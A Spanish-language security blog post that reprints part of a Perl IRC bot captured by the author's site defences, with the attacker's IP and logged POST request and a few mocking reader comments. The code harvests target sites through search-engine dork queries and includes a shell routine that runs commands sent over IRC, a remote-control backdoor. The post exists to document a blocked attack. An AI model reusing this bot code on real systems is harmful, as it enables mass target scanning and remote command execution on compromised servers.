    my $key = $_[0];

    for (my $i=0; $i<=1000; $i+=100){

        my $search = ("http://www.google.com/search?q=".key($key)."&num=100&filter=0&start=".$i);

        my $res = search_engine_query($search);

        while ($res =~ m/<a href=\"?http:\/\/([^>\"]*)\//g) {

            my $link = $1;

            if ($link !~ /google/){

                my @grep = links($link);

                push(@list,@grep);

            }

        }

    }

    return @list;

}

sub alltheweb() {

    my @list;

    my $key = $_[0];

    for (my $i=0; $i<=1000; $i+=100) {

        my $search = ("http://www.alltheweb.com/search?cat=web&_sb_lang=any&hits=100&q=".key($key)."&o=".$i);

        my $res = search_engine_query($search);

        while ($res =~ m/<span class=\"?resURL\"?>http:\/\/(.+?)\<\/span>/g) {

            my $link = $1;

            $link =~ s/ //g;

            my @grep = links($link);

            push(@list,@grep);

        }

    }

    return @list;

}

sub uol() {

    my @list;

    my $key = $_[0];

    for (my $i=1; $i<=1000; $i+=10) {

        my $search = ("http://mundo.busca.uol.com.br/buscar.html?q=".key($key)."&start=".$i);

        my $res = search_engine_query($search);

        while ($res =~ m/<a href=\"http:\/\/([^>\"]*)/g) {

            my $link = $1;

            if ($link !~ /busca|uol|yahoo/) {

                my @grep = links($link);

                push(@list,@grep);

            }

        }

    }

    return @list;

}

sub bing() {

    my @list;

    my $key = $_[0];

    for (my $i=1; $i<=1000; $i+=10) {

        my $search = ("http://www.bing.com/search?q=".key($key)."&filt=all&first=".$i."&FORM=PERE");

        my $res = search_engine_query($search);

        while ($res =~ m/<a href=\"?http:\/\/([^>\"]*)\//g) {

            my $link = $1;

            if ($link !~ /msn|live|bing/) {

                my @grep = links($link);

                push(@list,@grep);

            }

        }

    }

    return @list;

}

sub altavista() {

    my @list;

    my $key = $_[0];

    for (my $i=1; $i<=1000; $i+=10){

        my $search = ("http://it.altavista.com/web/results?itag=ody&kgs=0&kls=0&dis=1&q=".key($key)."&stq=".$i);

        my $res = search_engine_query($search);

        while ($res =~ m/<span class=ngrn>(.+?)\//g) {

            my $link = $1;

            if ($link !~ /altavista/){

                $link =~ s/<//g;

                $link =~ s/ //g;

                my @grep = links($link);

                push(@list,@grep);

            }

        }

    }

    return @list;

}

sub ask() {

    my @list;

    my $key = $_[0];

    for (my $i=0; $i<=1000; $i+=10) {

        my $search = ("http://it.ask.com/web?q=".key($key)."&o=0&l=dir&qsrc=0&qid=EE90DE6E8F5370F363A63EC61228D4FE&dm=all&page=".$i);

        my $res = search_engine_query($search);

        while ($res =~ m/href=\"http:\/\/(.+?)\" onmousedown=/g) {

            my $link = $1;

            if ($link !~ /ask\.com/){

                my @grep = links($link);

                push(@list,@grep);

            }

        }

    }

    return @list;

}

sub yahoo() {

    my @list;

    my $key = $_[0];

    for (my $i=1; $i<=500; $i+=1) {

        my $search = ("http://www.search.yahoo.com/search?p=".key($key)."&ei=UTF-8&fr=yfp-t-501&fp_ip=IT&pstart=1&b=".$i);

        my $res = search_engine_query($search);

        while ($res =~ m/26u=(.*?)%26w=/g) {

            my $link = $1;

            if ($link!~ /yahoo/){

                my @grep = links($link);

                push(@list,@grep);

            }

        }

    }

    return @list;

}

#########################################

sub clean() {

    my @cln = ();

    my %visit = ();

    foreach my $element (@_) {

        $element =~ s/\/+/\//g;

        next if $visit{$element}++;

        push @cln, $element;

    }

    return @cln;

}

sub key() {

    my $dork = $_[0];

    $dork =~ s/ /\+/g;

    $dork =~ s/:/\%3A/g;

    $dork =~ s/\//\%2F/g;

    $dork =~ s/&/\%26/g;

    $dork =~ s/\"/\%22/g;

    $dork =~ s/,/\%2C/g;

    $dork =~ s/\\/\%5C/g;

    return $dork;

}

sub links() {

    my @list;

    my $link = $_[0];

    my $host = $_[0];

    my $hdir = $_[0];

    $hdir =~ s/(.*)\/[^\/]*$/\1/;

    $host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/;

    $host .= "/";

    $link .= "/";

    $hdir .= "/";

    $host =~ s/\/\//\//g;

    $hdir =~ s/\/\//\//g;

    $link =~ s/\/\//\//g;

    push(@list,$link,$host,$hdir);

    return @list;

}

sub search_engine_query() {

    my $url = $_[0];

    $url =~ s/http:\/\///;

    my $host = $url;

    my $query = $url;

    my $page  = "";

    $host =~ s/href=\"?http:\/\///;

    $host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/;

    $query =~ s/$host//;

    if ($query eq "") { $query = "/"; }

        eval {

            my $sock = IO::Socket::INET->new(PeerAddr=>"$host", PeerPort=>"80", Proto=>"tcp") or return;

            print $sock "GET $query HTTP/1.0\r\nHost: $host\r\nAccept: */*\r\nUser-Agent: $uagent\r\n\r\n";

            my @pages = <$sock>;

            $page = "@pages";

            close($sock);

        };

    return $page;

}

#########################################

sub shell() {

    my $path = $_[0];

    my $cmd = $_[1];

    if ($cmd =~ /cd (.*)/) {

        chdir("$1") || &msg("$path","No such file or directory");

        return;

    }

    elsif ($pid = fork) { waitpid($pid, 0); }

    else { if (fork) { exit; } else {

        my @output = `$cmd 2>&1 3>&1`;

        my $c = 0;

        foreach my $output (@output) {

            $c++;

            chop $output;

            &msg("$path","$output");

            if ($c == 5) { $c = 0; sleep 3; }

        }

        exit;

    }}

}

sub isAdmin() {

    my $status = 0;

    my $nick = $_[0];

    if ($nick eq $admin) { $status = 1; }

    return $status;

}

sub msg() {

    return unless $#_ == 1;

    sendraw($IRC_cur_socket, "PRIVMSG $_[0] :$_[1]");

}

sub nick() {

    return unless $#_ == 0;

    sendraw("NICK $_[0]");

}

sub notice() {

    return unless $#_ == 1;

    sendraw("NOTICE $_[0] :$_[1]");

}

 

[/codesyntax]

No tengo mucha idea de perl la verdad pero parece un backdoor por el $fakeproc

Bueno, de otra cosa no se pero si que estoy bien contento de mi sistema de seguridad contra este tipo de ataques haha.

174.122.183.58
3a.b7.7aae.static.theplanet.com 

2011-05-08 17:36:33

POST /contact.php HTTP/1.1
TE: deflate,gzip;q=0.3
Connection: TE, close
Host: www.durkh3im.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 1008

 

Un saludo!!

Matías Moreno Cárdenas

Publicado por: Matías Moreno Cárdenas

Analista de Seguridad IT y hacking ético / Desarrollador de Software Multiplataforma. Actualmente analista de seguridad informática y hacking ético en Grupo SIA

  1. Avatar

    jhaajaahaahj

    pedazo noobs atakan por envidia Durk xDD

    eh xD

    bueno en fin.. dejalos

    saludos!

    Responder

  2. Avatar

    Jajajaj bola de idiotas que te atacan. No pueden hacer nada JAJAJAJ.

    Buen sistema salu2

    Wocar

    Responder

  3. Avatar

    jajajaja que lamer

    Responder

Deja un comentario